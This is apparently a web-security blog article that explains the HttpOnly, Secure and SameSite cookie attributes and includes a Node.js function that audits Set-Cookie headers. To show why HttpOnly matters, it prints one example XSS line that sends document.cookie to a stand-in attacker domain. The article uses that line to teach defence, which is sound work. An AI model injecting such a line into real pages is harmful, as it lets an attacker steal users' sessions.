Cookies Attributes – Secure, HttpOnly, SameSite | CyberNcrypt
Cookies are the most common method of giving websites temporary persistence. The majority of websites use them, and we are all familiar with their consent banners. HTTP cookies may carry vital and confidential information; their use began around 1994, some significant legacy issues were left unaddressed, and new state-of-the-art security enhancements are now being implemented. Some modern browsers have been handling the Secure, HttpOnly, and SameSite cookie attributes for quite some time, and they will soon be enforced.
In this article, we’ll explain each one, why developers should care about them, and why their correct implementation adds to the security of your website.
HttpOnly Flag
The primary purpose of the HttpOnly attribute is to prevent access to cookie values via JavaScript, thereby mitigating Cross-site scripting (XSS) attacks.
XSS can in principle be avoided simply by sanitizing user input and removing tags, but one small mistake can have huge consequences.
Additionally, third-party scripts may compromise user security. Every year we hear about successful attacks of this kind.
Imagine that your website stores a session cookie and contains an XSS-vulnerable input field. Then it is quite simple for an attacker to inject a script that makes an HTTP request to a URL similar to the one below.
`attackerDomain.com/cookie=${document.cookie}`
This is possible because document.cookie is accessible to all JavaScript code and exposes all cookies set for the current domain.
If you do store a session there, the attacker gains access to the user's current session.
To prevent these attacks, cookies should contain the HttpOnly flag.
The HttpOnly attribute disallows JavaScript access to the cookie.
Note that a cookie created with HttpOnly will still be sent along with requests that JavaScript initiates, for example via fetch(); the flag only blocks reading the value, not sending it.
SameSite attribute
The SameSite cookie attribute provides some defense against cross-site request forgery (CSRF) by asserting that cookies should not be sent with cross-origin requests. CSRF is predominantly associated with third-party cookies. By “third parties,” we mean websites that we do not directly visit. SameSite allows developers to specify cookie security for each specific case.
SameSite supports three possible values: Strict, Lax, and None.
- Lax — Default value in modern browsers. Cookies may be transmitted with top-level navigations and will be transmitted with GET requests initiated by a third-party website. The cookie is not sent on cross-site subrequests, such as calls to load images or frames, but is sent when a user navigates to the URL from an external site, for example by clicking a link.
- Strict — As the name suggests, the same-site rule is applied strictly when this option is selected. Cookies will only be sent in a first-party context and will not accompany requests from third-party websites: the browser only transmits them for same-site requests (that is, requests originating from the same site that set the cookie). No cookie with the SameSite=Strict attribute is sent if the request originated from a different site than the current one.
- None — Cookies will be sent in all contexts; cross-origin sending is permitted. The cookie is transmitted by the browser for both cross-site and same-site requests.
Lax is now the default value for cross-site request forgery (CSRF) protection in newer browser versions. Previously, None was the default value.
Note: Using SameSite=None necessitates the Secure attribute in the most recent versions of some browsers.
Secure attribute
The Secure cookie attribute is easier to understand. A Secure cookie is only transmitted to the server with an encrypted HTTPS request, which mitigates man-in-the-middle (MITM) interception of the cookie on plain HTTP. Note that insecure websites (whose URLs begin with http:) cannot set cookies with the Secure attribute.
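As an added example (not code from the original article), here is a small Node.js audit function that parses a Set-Cookie header and reports which of the three attributes discussed above are missing or inconsistent; the sample headers are constructed for the demonstration.

```javascript
// Added example, not from the original article: parse one Set-Cookie header
// and report which of HttpOnly, Secure and SameSite are missing or inconsistent.
// Plain Node.js, no third-party modules; sample headers below are constructed.

function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = nameValue.indexOf('=');
  const cookie = {
    name: eq === -1 ? nameValue : nameValue.slice(0, eq),
    value: eq === -1 ? '' : nameValue.slice(eq + 1),
    attributes: {}, // attribute names lower-cased; valueless flags stored as true
  };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Returns the cookie name plus a list of findings; an empty list means the
// header carries every attribute the article recommends for a session cookie.
function auditSetCookie(header) {
  const { name, attributes: a } = parseSetCookie(header);
  const findings = [];
  const secure = 'secure' in a;
  if (!('httponly' in a)) findings.push('missing HttpOnly: readable via document.cookie');
  if (!secure) findings.push('missing Secure: also sent over plain HTTP');
  const sameSite = typeof a.samesite === 'string' ? a.samesite.toLowerCase() : null;
  if (sameSite === null) {
    findings.push('missing SameSite: browser default (Lax) applies');
  } else if (sameSite === 'none' && !secure) {
    findings.push('SameSite=None requires Secure; recent browsers reject the cookie');
  } else if (!['strict', 'lax', 'none'].includes(sameSite)) {
    findings.push(`unknown SameSite value "${a.samesite}"`);
  }
  return { name, findings };
}

// Constructed sample headers: the weak form and its hardened counterpart.
const WEAK_HEADER = 'sessionid=abc123; Path=/';
const HARDENED_HEADER = 'sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict';

for (const h of [WEAK_HEADER, HARDENED_HEADER]) {
  const { name, findings } = auditSetCookie(h);
  console.log(`${name}: ${findings.length ? findings.join('; ') : 'ok'}`);
}
```

Running it prints three findings for the weak header and "ok" for the hardened one; the same function can be pointed at headers captured from your own application's responses.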
Conclusion
- Don’t store sensitive data in cookies unless required.
- Use the HttpOnly attribute to prevent XSS attacks from reading cookies.
- SameSite cookies can be used to mitigate CSRF attacks.
- Use Secure to prevent MITM attacks.
Modern browsers currently support these attributes. Every web developer ought to be aware of and employ them. Utilizing them will improve the security of your cookies, so go ahead and use them to increase the security of your website!